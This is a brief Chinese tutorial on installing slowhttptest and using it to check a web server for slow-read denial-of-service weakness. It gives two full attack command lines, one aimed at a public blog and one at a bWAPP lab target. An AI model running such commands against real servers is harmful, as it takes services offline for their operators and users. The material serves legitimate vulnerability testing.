测试工具 slowhttptest
安装方法一:
1 安装openssl和libssl-dev
- sudo apt-get install openssl
- sudo apt-get install libssl-dev
安装libssl如果失败,执行apt-get update,然后再执行sudo apt-get install libssl-dev
2 安装slowhttptest
- git clone https://github.com/shekyan/slowhttptest.git
- cd slowhttptest
- ./configure
- make
- make install
安装方法二:
- sudo apt-get install slowhttptest
白帽子验证该漏洞的语句如下:
- slowhttptest -c 1000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://blog.cnpanda.net -p 3
- slowhttptest -c 1000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://192.168.18.252/bWAPP/sm_dos_1.php -p 8
等 service available 属性为NO时,说明攻击成功。